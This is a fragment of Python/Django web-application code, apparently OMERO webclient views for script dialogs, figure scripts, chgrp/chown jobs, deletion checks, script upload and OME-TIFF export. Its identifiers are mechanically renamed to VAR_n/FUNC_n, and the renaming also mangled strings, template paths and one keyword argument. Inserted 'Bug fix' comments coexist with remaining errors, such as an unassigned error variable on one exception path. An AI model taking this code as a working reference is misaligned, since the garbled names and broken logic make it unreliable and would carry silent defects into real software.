        VAR_209.append(VAR_320)
        if VAR_312 == "IDs":
            VAR_211 = VAR_320  # remember these...
        if VAR_312 == "Data_Type":
            VAR_210 = VAR_320
    # Fix: list.sort() keyword is 'key'
    VAR_209.sort(key=lambda VAR_320: VAR_320["grouping"])

    if (
        VAR_210 is not None
        and VAR_211 is not None
        and "options" in VAR_210
    ):
        # Pre-select Data_Type / IDs from GET params like ?Image=1,2
        VAR_211["default"] = ""
        for VAR_215 in VAR_210["options"]:
            if VAR_2.GET.get(VAR_215, None) is not None:
                VAR_210["default"] = VAR_215
                VAR_211["default"] = VAR_2.GET.get(VAR_215, "")
                break  # only use the first match
        # ?Well=1,2 - resolve the wells' images when the script accepts Images
        if len(VAR_211["default"]) == 0 and VAR_2.GET.get("Well", None) is not None:
            if "Image" in VAR_210["options"]:
                VAR_214 = [VAR_241(j) for j in VAR_2.GET.get("Well", None).split(",")]
                VAR_324 = 0
                try:
                    VAR_324 = int(VAR_2.GET.get("Index", 0))
                except Exception:
                    pass
                VAR_113 = VAR_6.getObjects("Well", VAR_214)
                VAR_306 = [VAR_347(w.getImage(VAR_324).getId()) for w in VAR_113]
                VAR_210["default"] = "Image"
                VAR_211["default"] = ",".join(VAR_306)

    # Nest params by grouping: "03.1" entries become children of "03"
    for VAR_320 in range(len(VAR_209)):
        if len(VAR_209) <= VAR_320:
            break
        VAR_322 = VAR_209[VAR_320]
        VAR_323 = VAR_322["grouping"]  # E.g 03
        VAR_322["children"] = list()
        while len(VAR_209) > VAR_320 + 1:
            VAR_369 = VAR_209[VAR_320 + 1]["grouping"]  # E.g. 03.1
            if VAR_369.split(".")[0] == VAR_323:
                VAR_322["children"].append(VAR_209[VAR_320 + 1])
                VAR_209.pop(VAR_320 + 1)
            else:
                break
    VAR_208["inputs"] = VAR_209
    return {
        "template": "webclient/VAR_203/FUNC_68.html",
        "paramData": VAR_208,
        "scriptId": VAR_42,
    }
@login_required()
@render_response()
def FUNC_69(VAR_2, VAR_43, VAR_6=None, **VAR_7):
    """Build the context for a figure-script dialog.

    VAR_43 selects the dialog: "SplitView", "Thumbnail" or "MakeMovie".
    Image/Dataset/Well ids come from the GET params; Well ids are resolved
    to their images first (using ?Index= for the well-sample index).
    """
    VAR_212 = VAR_2.GET.get("Image", None)  # comma - delimited list
    VAR_213 = VAR_2.GET.get("Dataset", None)
    VAR_214 = VAR_2.GET.get("Well", None)
    if VAR_214 is not None:
        VAR_214 = [VAR_241(VAR_320) for VAR_320 in VAR_214.split(",")]
        VAR_113 = VAR_6.getObjects("Well", VAR_214)
        VAR_324 = getIntOrDefault(VAR_2, "Index", 0)
        VAR_212 = [VAR_347(w.getImage(VAR_324).getId()) for w in VAR_113]
        VAR_212 = ",".join(VAR_212)
    if VAR_212 is None and VAR_213 is None:
        return HttpResponse(
            "Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
        )

    def FUNC_86(VAR_215, VAR_187):
        # Resolve comma-separated ids into objects; 404 when none found,
        # otherwise set the group context from the first object.
        VAR_325 = [int(VAR_40) for VAR_40 in VAR_187.split(",")]
        VAR_326 = {}
        for VAR_38 in VAR_6.getObjects(VAR_215, VAR_325):
            VAR_326[VAR_38.id] = VAR_38
        VAR_327 = [VAR_41 for VAR_41 in VAR_325 if VAR_41 in VAR_326.keys()]
        if len(VAR_327) == 0:
            raise Http404("No %ss found with IDs %s" % (VAR_215, VAR_187))
        else:
            VAR_337 = list(VAR_326.values())[0].getDetails().group.id.val
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
        return VAR_327, VAR_326

    VAR_53 = {}
    if VAR_212 is not None:
        VAR_212, VAR_328 = FUNC_86("Image", VAR_212)
        VAR_53["idString"] = ",".join([VAR_347(VAR_320) for VAR_320 in VAR_212])
        VAR_53["dtype"] = "Image"
    if VAR_213 is not None:
        VAR_213, VAR_329 = FUNC_86("Dataset", VAR_213)
        VAR_53["idString"] = ",".join([VAR_347(VAR_320) for VAR_320 in VAR_213])
        VAR_53["dtype"] = "Dataset"
    if VAR_43 == "SplitView":
        VAR_330 = "/omero/figure_scripts/Split_View_Figure.py"
        VAR_54 = "webclient/VAR_203/split_view_figure.html"
        VAR_331 = []  # info dict per image: name, tags, parent datasets
        for VAR_432 in VAR_212:
            VAR_158 = {"id": VAR_432}
            VAR_370 = VAR_328[VAR_432]
            VAR_158["name"] = VAR_370.getName()
            VAR_164 = [
                VAR_180.getTextValue()
                for VAR_180 in VAR_370.listAnnotations()
                if VAR_180._obj.__class__ == omero.model.TagAnnotationI
            ]
            VAR_158["tags"] = VAR_164
            VAR_158["datasets"] = [VAR_364.getName() for VAR_364 in VAR_370.listParents()]
            VAR_331.append(VAR_158)
        VAR_142 = VAR_328[VAR_212[0]]
        VAR_53["imgDict"] = VAR_331
        VAR_53["image"] = VAR_142
        VAR_53["channels"] = VAR_142.getChannels()
    elif VAR_43 == "Thumbnail":
        VAR_330 = "/omero/figure_scripts/Thumbnail_Figure.py"
        VAR_54 = "webclient/VAR_203/thumbnail_figure.html"

        def FUNC_89(VAR_212):
            # Map each image id to its tag annotations; also return all tags.
            VAR_408 = VAR_6.getAnnotationLinks("Image", parent_ids=VAR_212)
            VAR_409 = {}  # image id -> [tags]
            VAR_410 = {}  # tag id -> tag (dedup)
            for VAR_432 in VAR_212:
                VAR_409[VAR_432] = []
            for VAR_346 in VAR_408:
                VAR_383 = VAR_346.getChild()
                if VAR_383._obj.__class__ == omero.model.TagAnnotationI:
                    VAR_410[VAR_383.id] = VAR_383
                    VAR_409[VAR_346.getParent().id].append(VAR_383)
            VAR_411 = []
            for VAR_432 in VAR_212:
                VAR_411.append({"id": VAR_432, "tags": VAR_409[VAR_432]})
            VAR_164 = []
            for tId, VAR_433 in VAR_410.items():
                VAR_164.append(VAR_433)
            return VAR_411, VAR_164

        VAR_371 = []  # multiple collections of images
        VAR_164 = []
        VAR_372 = "Thumbnail_Figure"
        if VAR_213 is not None:
            for VAR_364 in VAR_6.getObjects("Dataset", VAR_213):
                VAR_306 = [VAR_320.id for VAR_320 in VAR_364.listChildren()]
                VAR_411, VAR_412 = FUNC_89(VAR_306)
                VAR_371.append({"name": VAR_364.getName(), "imageTags": VAR_411})
                VAR_164.extend(VAR_412)
            VAR_372 = VAR_371[0]["name"]
        else:
            VAR_411, VAR_412 = FUNC_89(VAR_212)
            VAR_371.append({"name": "images", "imageTags": VAR_411})
            VAR_164.extend(VAR_412)
            VAR_413 = VAR_6.getObject("Image", VAR_212[0]).getParent()
            VAR_372 = VAR_413.getName() or "Thumbnail Figure"
            VAR_53["parent_id"] = VAR_413.getId()
        VAR_373 = set()  # remove duplicates
        VAR_374 = []
        for VAR_433 in VAR_164:
            if VAR_433.id not in VAR_373:
                VAR_374.append(VAR_433)
                VAR_373.add(VAR_433.id)
        # Fix: list.sort() keyword is 'key'
        VAR_374.sort(key=lambda x: x.getTextValue().lower())
        VAR_53["thumbSets"] = VAR_371
        VAR_53["tags"] = VAR_374
        VAR_53["figureName"] = VAR_372.replace(" ", "_")
    elif VAR_43 == "MakeMovie":
        VAR_330 = "/omero/export_scripts/Make_Movie.py"
        VAR_54 = "webclient/VAR_203/make_movie.html"
        VAR_142 = VAR_6.getObject("Image", VAR_212[0])
        # keep a short extension in the suggested movie name, drop long ones
        VAR_414 = VAR_142.getName().rsplit(".", 1)
        if len(VAR_414) > 1 and len(VAR_414[1]) > 3:
            VAR_414 = ".".join(VAR_414)
        else:
            # Fix: previously referenced the undefined name `movieName`
            VAR_414 = VAR_414[0]
        VAR_53["movieName"] = os.path.basename(VAR_414)
        VAR_282 = []
        for VAR_383 in VAR_142.getChannels():
            VAR_282.append(
                {
                    "active": VAR_383.isActive(),
                    "color": VAR_383.getColor().getHtml(),
                    "label": VAR_383.getLabel(),
                }
            )
        VAR_53["channels"] = VAR_282
        VAR_53["sizeT"] = VAR_142.getSizeT()
        VAR_53["sizeZ"] = VAR_142.getSizeZ()
    VAR_202 = VAR_6.getScriptService()
    VAR_42 = VAR_202.getScriptID(VAR_330)
    if VAR_42 < 0:
        raise AttributeError("No script found for VAR_316 '%s'" % VAR_330)
    VAR_53["template"] = VAR_54
    VAR_53["scriptId"] = VAR_42
    return VAR_53
@login_required()
@render_response()
def FUNC_70(VAR_2, VAR_27, VAR_6=None, **VAR_7):
    """Check whether the selected Images/Datasets/Projects would split any
    fileset, and build the confirmation-dialog context for action VAR_27."""
    selected = {}
    for dtype in ("Image", "Dataset", "Project"):
        raw_ids = VAR_2.GET.get(dtype, None)
        if raw_ids is not None:
            selected[dtype] = [int(i) for i in raw_ids.split(",")]
    by_fileset = VAR_6.getContainerService().getImagesBySplitFilesets(
        selected, None, VAR_6.SERVICE_OPTS
    )
    splits = [
        {
            "id": fs_id,
            "attempted_iids": split[True],
            "blocking_iids": split[False],
        }
        for fs_id, split in by_fileset.items()
    ]
    context = {"split_filesets": splits, "action": VAR_27}
    if VAR_27 == "chgrp":
        context["action"] = "move"
    context["template"] = "webclient/FUNC_63/fileset_check_dialog_content.html"
    return context
def FUNC_71(
    VAR_6, VAR_44, VAR_45, VAR_46, VAR_47, VAR_48, VAR_11
):
    """Expand a deletion selection and find containers it would orphan.

    Given ids of Projects (VAR_44), Datasets (VAR_45), Images (VAR_46),
    Screens (VAR_47) and Plates (VAR_48), expands the selection downwards
    (datasets of selected projects, plates of selected screens, images of
    selected datasets/plates, fileset siblings of selected images) and then
    computes which Datasets/Projects would be left childless.

    Returns {"remove": {...per-type id lists...},
             "childless": {"project": [...], "dataset": [...],
                           "orphaned": bool}}.
    VAR_11 is unused here but kept for interface compatibility.
    """
    VAR_73 = omero.sys.ParametersI()
    VAR_74 = VAR_6.getQueryService()
    VAR_44 = set(VAR_44)
    VAR_45 = set(VAR_45)
    VAR_46 = set(VAR_46)
    VAR_219 = set([])  # fileset ids of selected images
    VAR_48 = set(VAR_48)
    VAR_47 = set(VAR_47)
    # Datasets under the selected Projects
    if VAR_44:
        VAR_73.map = {}
        VAR_73.map["pids"] = rlist([rlong(x) for x in list(VAR_44)])
        VAR_75 = """
            select pdlink.child.id
            from ProjectDatasetLink pdlink
            where pdlink.parent.id in (:pids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_45.add(e[0].val)
    # Plates under the selected Screens
    if VAR_47:
        VAR_73.map = {}
        VAR_73.map["sids"] = rlist([rlong(x) for x in VAR_47])
        VAR_75 = """
            select splink.child.id
            from ScreenPlateLink splink
            where splink.parent.id in (:sids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_48.add(e[0].val)
    # Images (and their fileset ids) under the selected Datasets
    if VAR_45:
        VAR_73.map = {}
        VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
        VAR_75 = """
            select dilink.child.id,
                   dilink.child.fileset.id
            from DatasetImageLink dilink
            where dilink.parent.id in (:dids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
            if e[1] is not None:
                VAR_219.add(e[1].val)
    # Images under the selected Plates
    if VAR_48:
        VAR_73.map = {}
        VAR_73.map["plids"] = rlist([rlong(x) for x in VAR_48])
        VAR_75 = """
            select ws.image.id
            from WellSample ws
            join ws.plateAcquisition pa
            where pa.plate.id in (:plids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
    # All sibling images of multi-image filesets, so a fileset is never
    # partially removed.
    # Fix: the HQL below previously read "VAR_101 by" - mangled "group by".
    if VAR_219:
        VAR_73.map = {}
        VAR_73.map["fsids"] = rlist([rlong(x) for x in VAR_219])
        VAR_75 = """
            select image.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.fileset.id in (select fs.id
                                       from Image im
                                       join im.fileset fs
                                       where fs.id in (:fsids)
                                       group by fs.id
                                       having count(im.id)>1)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
    # Datasets that would be left empty once the images are removed
    VAR_220 = set([])
    VAR_221 = False  # True when removal empties the 'orphaned' container
    if VAR_46:
        # Fix: the placeholders below previously read "(:VAR_153)", which
        # did not match the parameter map key "iids".
        VAR_73.map = {
            "iids": rlist([rlong(x) for x in VAR_46]),
        }
        VAR_332 = ""
        if VAR_45:
            VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
            VAR_332 = """
                and (
                    dilink.parent.id not in (:dids)
                    or dilink.parent.id = null
                )
                """
        VAR_75 = (
            """
            select distinct dilink.parent.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.id in (:iids)
            %s
            and (select count(dilink2.child.id)
                 from DatasetImageLink dilink2
                 where dilink2.parent.id = dilink.parent.id
                 and dilink2.child.id not in (:iids)) = 0
            """
            % VAR_332
        )
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            if e:
                VAR_220.add(e[0].val)
            else:
                VAR_221 = True
    # Projects that would be left empty once the datasets are removed
    VAR_222 = set([])
    if VAR_45:
        VAR_73.map = {"dids": rlist([rlong(x) for x in VAR_45])}
        VAR_333 = ""
        if VAR_44:
            VAR_73.map["pids"] = rlist([rlong(x) for x in VAR_44])
            VAR_333 = "and pdlink.parent.id not in (:pids)"
        VAR_75 = (
            """
            select distinct pdlink.parent.id
            from ProjectDatasetLink pdlink
            where pdlink.child.id in (:dids)
            %s
            and (select count(pdlink2.child.id)
                 from ProjectDatasetLink pdlink2
                 where pdlink2.parent.id = pdlink.parent.id
                 and pdlink2.child.id not in (:dids)) = 0
            """
            % VAR_333
        )
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_222.add(e[0].val)
    VAR_223 = {
        "remove": {
            "project": list(VAR_44),
            "dataset": list(VAR_45),
            "screen": list(VAR_47),
            "plate": list(VAR_48),
            "image": list(VAR_46),
        },
        "childless": {
            "project": list(VAR_222),
            "dataset": list(VAR_220),
            "orphaned": VAR_221,
        },
    }
    return VAR_223
@require_POST
@login_required()
def FUNC_72(VAR_2, VAR_6=None, **VAR_7):
    """Submit a chgrp dry-run; thin wrapper around FUNC_73.

    Fix: the connection kwarg previously passed the undefined name `conn`
    instead of the local VAR_6.
    """
    return FUNC_73(VAR_2, VAR_27="chgrp", VAR_6=VAR_6, **VAR_7)
@require_POST
@login_required()
def FUNC_73(VAR_2, VAR_27, VAR_6=None, **VAR_7):
    """Submit a chgrp/chown dry-run for the POSTed object ids and return the
    job handle id as a plain-text response."""
    targets = {}
    for dtype in ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]:
        raw = VAR_2.POST.get(dtype, None)
        if raw is None:
            continue
        targets[dtype] = [int(x) for x in raw.split(",")]
    if VAR_27 == "chgrp":
        target_id = getIntOrDefault(VAR_2, "group_id", None)
    elif VAR_27 == "chown":
        target_id = getIntOrDefault(VAR_2, "owner_id", None)
    handle = VAR_6.submitDryRun(VAR_27, targets, target_id)
    return HttpResponse(VAR_347(handle))
@login_required()
def FUNC_74(VAR_2, VAR_6=None, **VAR_7):
    """Move the POSTed objects into another group (chgrp).

    Optionally creates a new target container, submits one chgrp job per
    object type, records each job in the session "callback" dict and
    returns the refreshed tree state computed by FUNC_71.
    """
    if not VAR_2.method == "POST":
        # Bug fix: `VAR_315` is not a JsonResponse kwarg; the HTTP status
        # keyword is `status`.
        return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
    VAR_20 = getIntOrDefault(VAR_2, "group_id", None)
    if VAR_20 is None:
        return JsonResponse({"Error": "chgrp: No VAR_20 specified"})
    VAR_20 = VAR_241(VAR_20)

    def FUNC_87(VAR_71):
        # Owner of the first object found among the POSTed ids; used so
        # that any new container is created on behalf of that user.
        for VAR_433 in ["Dataset", "Image", "Plate"]:
            VAR_187 = VAR_71.POST.get(VAR_433, None)
            if VAR_187 is not None:
                for o in list(VAR_6.getObjects(VAR_433, VAR_187.split(","))):
                    return o.getDetails().owner.id.val

    VAR_101 = VAR_6.getObject("ExperimenterGroup", VAR_20)
    VAR_226 = VAR_2.POST.get("new_container_name", None)
    VAR_227 = VAR_2.POST.get("new_container_type", None)
    VAR_228 = None
    VAR_229 = FUNC_87(VAR_2)
    VAR_6.SERVICE_OPTS.setOmeroUser(VAR_229)
    if (
        VAR_226 is not None
        and len(VAR_226) > 0
        and VAR_227 is not None
    ):
        VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_20)
        VAR_228 = VAR_6.createContainer(VAR_227, VAR_226)
    if VAR_228 is None:
        # target_id has the form "<type>-<id>"
        VAR_334 = VAR_2.POST.get("target_id", None)
        VAR_228 = VAR_334 is not None and VAR_334.split("-")[1] or None
    VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
    for VAR_215 in VAR_225:
        VAR_154 = VAR_2.POST.get(VAR_215, None)
        if VAR_154 is not None:
            VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
            VAR_307 = VAR_2.POST.getlist("fileset")
            if len(VAR_307) > 0:
                if VAR_215 == "Dataset":
                    # Bug fix: was `VAR_307=fsIds` with undefined `fsIds`.
                    VAR_6.regroupFilesets(dsIds=VAR_144, VAR_307=VAR_307)
                else:
                    # Moving images: include every image of each fileset.
                    for VAR_365 in VAR_6.getObjects("Fileset", VAR_307):
                        VAR_144.extend([VAR_320.id for VAR_320 in VAR_365.copyImages()])
                    VAR_144 = list(set(VAR_144))  # remove duplicates
            VAR_0.debug("chgrp to VAR_101:%s %s-%s" % (VAR_20, VAR_215, VAR_144))
            VAR_84 = VAR_6.chgrpObjects(VAR_215, VAR_144, VAR_20, VAR_228)
            VAR_198 = VAR_347(VAR_84)
            VAR_2.session["callback"][VAR_198] = {
                "job_type": "chgrp",
                "group": VAR_101.getName(),
                "to_group_id": VAR_20,
                "dtype": VAR_215,
                "obj_ids": VAR_144,
                "job_name": "Change group",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
    VAR_2.session.modified = True
    # Work out which containers the client should refresh.
    VAR_44 = VAR_2.POST.get("Project", [])
    VAR_45 = VAR_2.POST.get("Dataset", [])
    VAR_46 = VAR_2.POST.get("Image", [])
    VAR_47 = VAR_2.POST.get("Screen", [])
    VAR_48 = VAR_2.POST.get("Plate", [])
    # Bug fix: the parsed id lists were assigned to unused names
    # (project_ids, ...) while the raw comma-separated strings were passed
    # to FUNC_71; assign back to the variables actually used below.
    if VAR_44:
        VAR_44 = [VAR_241(x) for x in VAR_44.split(",")]
    if VAR_45:
        VAR_45 = [VAR_241(x) for x in VAR_45.split(",")]
    if VAR_46:
        VAR_46 = [VAR_241(x) for x in VAR_46.split(",")]
    if VAR_47:
        VAR_47 = [VAR_241(x) for x in VAR_47.split(",")]
    if VAR_48:
        VAR_48 = [VAR_241(x) for x in VAR_48.split(",")]
    VAR_230 = FUNC_71(
        VAR_6,
        VAR_44,
        VAR_45,
        VAR_46,
        VAR_47,
        VAR_48,
        VAR_2.session.get("user_id"),
    )
    return JsonResponse({"update": VAR_230})
@login_required()
def FUNC_75(VAR_2, VAR_6=None, **VAR_7):
    """Change the owner of the POSTed objects (chown).

    Submits one chown job per object type, records each job in the
    session "callback" dict and returns the job ids as JSON.
    """
    if not VAR_2.method == "POST":
        # Bug fix: `VAR_315` is not a JsonResponse kwarg; use `status`.
        return JsonResponse({"Error": "Need to POST to chown"}, status=405)
    VAR_231 = getIntOrDefault(VAR_2, "owner_id", None)
    if VAR_231 is None:
        return JsonResponse({"Error": "chown: No VAR_231 specified"})
    VAR_231 = int(VAR_231)
    VAR_232 = VAR_6.getObject("Experimenter", VAR_231)
    if VAR_232 is None:
        # Bug fix: the original format string had no placeholder, so the
        # `%` operation raised TypeError instead of reporting the error.
        return JsonResponse({"Error": "chown: Experimenter not found: %s" % VAR_231})
    VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
    VAR_233 = []
    for VAR_215 in VAR_225:
        VAR_154 = VAR_2.POST.get(VAR_215, None)
        if VAR_154 is not None:
            VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
            VAR_0.debug("chown to VAR_103:%s %s-%s" % (VAR_231, VAR_215, VAR_144))
            VAR_84 = VAR_6.chownObjects(VAR_215, VAR_144, VAR_231)
            VAR_198 = VAR_347(VAR_84)
            VAR_233.append(VAR_198)
            VAR_2.session["callback"][VAR_198] = {
                "job_type": "chown",
                "owner": VAR_232.getFullName(),
                "to_owner_id": VAR_231,
                "dtype": VAR_215,
                "obj_ids": VAR_144,
                "job_name": "Change owner",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
    VAR_2.session.modified = True
    return JsonResponse({"jobIds": VAR_233})
@login_required(setGroupContext=True)
def FUNC_76(VAR_2, VAR_42, VAR_6=None, **VAR_7):
    """Run the script VAR_42, building its input map from the POST data.

    Each script parameter is converted from the POSTed strings to the
    rtype declared by the script's prototype, then the run is delegated
    to FUNC_79 and its result returned as JSON.
    """
    VAR_202 = VAR_6.getScriptService()
    VAR_50 = {}
    VAR_49 = VAR_241(VAR_42)
    try:
        VAR_73 = VAR_202.getParams(VAR_49)
    except Exception as x:
        if x.message and x.message.startswith("No processor available"):
            # FUNC_79 knows how to report the "no processor" condition.
            VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script")
            return JsonResponse(VAR_174)
        else:
            raise
    VAR_73 = VAR_202.getParams(VAR_49)
    VAR_43 = VAR_73.name.replace("_", " ").replace(".py", "")
    VAR_0.debug("Script: run with VAR_2.POST: %s" % VAR_2.POST)
    VAR_234 = (
        "file_annotation" in VAR_2.FILES and VAR_2.FILES["file_annotation"] or None
    )
    VAR_235 = None
    if VAR_234 is not None and VAR_234 != "":
        VAR_104 = BaseContainer(VAR_6)
        VAR_235 = VAR_104.createFileAnnotations(VAR_234, [])
    for VAR_312, VAR_322 in VAR_73.inputs.items():
        VAR_335 = VAR_322.prototype
        VAR_336 = VAR_335.__class__
        # Uploaded file annotation is wired straight into the input map.
        if VAR_312 == "File_Annotation" and VAR_235 is not None:
            VAR_50[VAR_312] = VAR_336(VAR_347(VAR_235))
            continue
        # Checkboxes: presence of the key means True.
        if VAR_336 == omero.rtypes.RBoolI:
            VAR_375 = VAR_312 in VAR_2.POST
            VAR_50[VAR_312] = VAR_336(VAR_375)
            continue
        # Maps arrive as <name>_key0/<name>_value0, <name>_key1/... pairs.
        if VAR_336.__name__ == "RMapI":
            VAR_376 = "%s_key0" % VAR_312
            VAR_377 = "%s_value0" % VAR_312
            VAR_378 = 0
            VAR_379 = {}
            while VAR_376 in VAR_2.POST:
                VAR_415 = VAR_347(VAR_2.POST[VAR_376])
                VAR_416 = VAR_2.POST[VAR_377]
                if len(VAR_415) > 0 and len(VAR_416) > 0:
                    VAR_379[VAR_347(VAR_415)] = VAR_416
                VAR_378 += 1
                VAR_376 = "%s_key%d" % (VAR_312, VAR_378)
                VAR_377 = "%s_value%d" % (VAR_312, VAR_378)
            if len(VAR_379) > 0:
                VAR_50[VAR_312] = wrap(VAR_379)
            continue
        if VAR_312 in VAR_2.POST:
            if VAR_336 == omero.rtypes.RListI:
                VAR_417 = VAR_2.POST.getlist(VAR_312)
                if len(VAR_417) == 0:
                    continue
                if len(VAR_417) == 1:  # process comma-separated list
                    if len(VAR_417[0]) == 0:
                        continue
                    # Bug fix: was `values[0].split(",")` with undefined
                    # name `values`; split the single POSTed entry.
                    VAR_417 = VAR_417[0].split(",")
                # Determine element rtype from the prototype's first item;
                # default to rstring for empty prototypes.
                VAR_418 = omero.rtypes.RStringI
                VAR_419 = VAR_335.val  # list
                if len(VAR_419) > 0:
                    VAR_418 = VAR_419[0].__class__
                    if VAR_418 == int(1).__class__:
                        VAR_418 = omero.rtypes.rint
                    if VAR_418 == VAR_241(1).__class__:
                        VAR_418 = omero.rtypes.rlong
                VAR_420 = []
                for VAR_416 in VAR_417:
                    try:
                        VAR_38 = VAR_418(VAR_416.strip())
                    except Exception:
                        VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_312, VAR_416))
                        continue
                    if isinstance(VAR_38, omero.model.IObject):
                        VAR_420.append(omero.rtypes.robject(VAR_38))
                    else:
                        VAR_420.append(VAR_38)
                VAR_50[VAR_312] = omero.rtypes.rlist(VAR_420)
            else:
                VAR_375 = VAR_2.POST[VAR_312]
                if len(VAR_375) == 0:
                    continue
                try:
                    VAR_50[VAR_312] = VAR_336(VAR_375)
                except Exception:
                    VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_312, VAR_375))
                    continue
    # Run the script in the group of the first target object (if any).
    if "IDs" in VAR_50 and "Data_Type" in VAR_50:
        VAR_337 = VAR_6.SERVICE_OPTS.getOmeroGroup()
        VAR_6.SERVICE_OPTS.setOmeroGroup("-1")
        try:
            VAR_380 = VAR_6.getObject(
                VAR_50["Data_Type"].val, unwrap(VAR_50["IDs"])[0]
            )
            VAR_381 = VAR_380.getDetails().group.id.val
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_381)
        except Exception:
            VAR_0.debug(traceback.format_exc())
            # Restore the previous group on failure.
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
    try:
        VAR_0.debug("Running script %s with " "params %s" % (VAR_43, VAR_50))
    except Exception:
        pass
    VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43)
    return JsonResponse(VAR_174)
@login_required(isAdmin=True)
@render_response()
def FUNC_77(VAR_2, VAR_6=None, **VAR_7):
    """Upload (or replace) an official server-side script.

    GET renders the upload form; POST saves the uploaded file under the
    given script path, editing the existing script if one already exists.
    """
    if VAR_2.method != "POST":
        return {"template": "webclient/VAR_203/upload_script.html"}
    VAR_236 = VAR_2.POST.get("script_path")
    VAR_237 = VAR_2.FILES["script_file"]
    VAR_237.seek(0)
    VAR_238 = VAR_237.read().decode("utf-8")
    # Bug fix: both lines below referenced the undefined name
    # `script_path`; build the full path from the VAR_236 parameter.
    if not VAR_236.endswith("/"):
        VAR_236 = VAR_236 + "/"
    VAR_236 = VAR_236 + VAR_237.name
    VAR_202 = VAR_6.getScriptService()
    VAR_239 = VAR_202.getScriptID(VAR_236)
    try:
        if VAR_239 > 0:
            # Existing script: replace its contents in place.
            VAR_173 = OriginalFileI(VAR_239, False)
            VAR_202.editScript(VAR_173, VAR_238)
            VAR_382 = "Script Replaced: %s" % VAR_237.name
        else:
            VAR_239 = VAR_202.uploadOfficialScript(VAR_236, VAR_238)
            VAR_382 = "Script Uploaded: %s" % VAR_237.name
    except omero.ValidationException as ex:
        VAR_382 = VAR_347(ex)
    return {"Message": VAR_382, "script_id": VAR_239}
@require_POST
@login_required()
def FUNC_78(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Run the Batch_Image_Export script to build an OME-TIFF of one image."""
    VAR_202 = VAR_6.getScriptService()
    VAR_49 = VAR_202.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
    VAR_142 = VAR_6.getObject("Image", VAR_26)
    if VAR_142 is not None:
        # Scope the script run to the image's own group.
        VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_142.getDetails().group.id.val)
    VAR_50 = {
        "Data_Type": wrap("Image"),
        "IDs": rlist([rlong(VAR_40) for VAR_40 in [VAR_241(VAR_26)]]),
        "Format": wrap("OME-TIFF"),
    }
    VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Create OME-TIFF")
    return JsonResponse(VAR_174)
def FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script"):
    """Launch script VAR_49 with inputs VAR_50 and track it in the session.

    On success returns {"jobId", "status"}; on failure records the error
    in the session "callback" dict and returns {"status", "error"}.
    """
    VAR_2.session.modified = True
    VAR_202 = VAR_6.getScriptService()
    try:
        VAR_84 = VAR_202.runScript(VAR_49, VAR_50, None, VAR_6.SERVICE_OPTS)
        VAR_198 = VAR_347(VAR_84)
        VAR_315 = "in progress"
        VAR_2.session["callback"][VAR_198] = {
            "job_type": "script",
            "job_name": VAR_43,
            "start_time": datetime.datetime.now(),
            "status": VAR_315,
        }
        VAR_2.session.modified = True
    except Exception as x:
        VAR_198 = VAR_347(time())  # E.g. 1312803670.6076391
        # Python 3 exceptions have no .message; fall back to args.
        VAR_382 = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
        if VAR_382 and VAR_382.startswith("No processor available"):
            VAR_0.info(traceback.format_exc())
            VAR_57 = "No Processor Available"
            VAR_315 = "no processor available"
            VAR_382 = ""  # VAR_54 displays VAR_382 and VAR_346
        else:
            if isinstance(x, omero.ValidationException):
                # Bug fix: was VAR_0.debug(x.message), which raises
                # AttributeError on Python 3; use the safe VAR_382.
                VAR_0.debug(VAR_382)
            else:
                VAR_0.error(traceback.format_exc())
                VAR_57 = traceback.format_exc()
            VAR_315 = "failed"
            # Bug fix: VAR_382 was re-read from x.message here, undoing the
            # hasattr-guarded value computed above; keep the safe value.
        VAR_2.session["callback"][VAR_198] = {
            "job_type": "script",
            "job_name": VAR_43,
            "start_time": datetime.datetime.now(),
            "status": VAR_315,
            "Message": VAR_382,
            "error": VAR_57,
        }
        return {"status": VAR_315, "error": VAR_57}
    return {"jobId": VAR_198, "status": VAR_315}
@login_required()
@render_response()
def FUNC_80(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Return info about the most recent OME-TIFF generated for an image.

    Looks up annotations in the NSOMETIFF namespace and returns the
    newest one's creation date, age, id and download URL (JSON via the
    render_response decorator). Empty dict when none exist.
    """
    VAR_240 = list(
        VAR_6.getAnnotationLinks(
            "Image", [VAR_26], VAR_90=omero.constants.namespaces.NSOMETIFF
        )
    )
    VAR_172 = {}
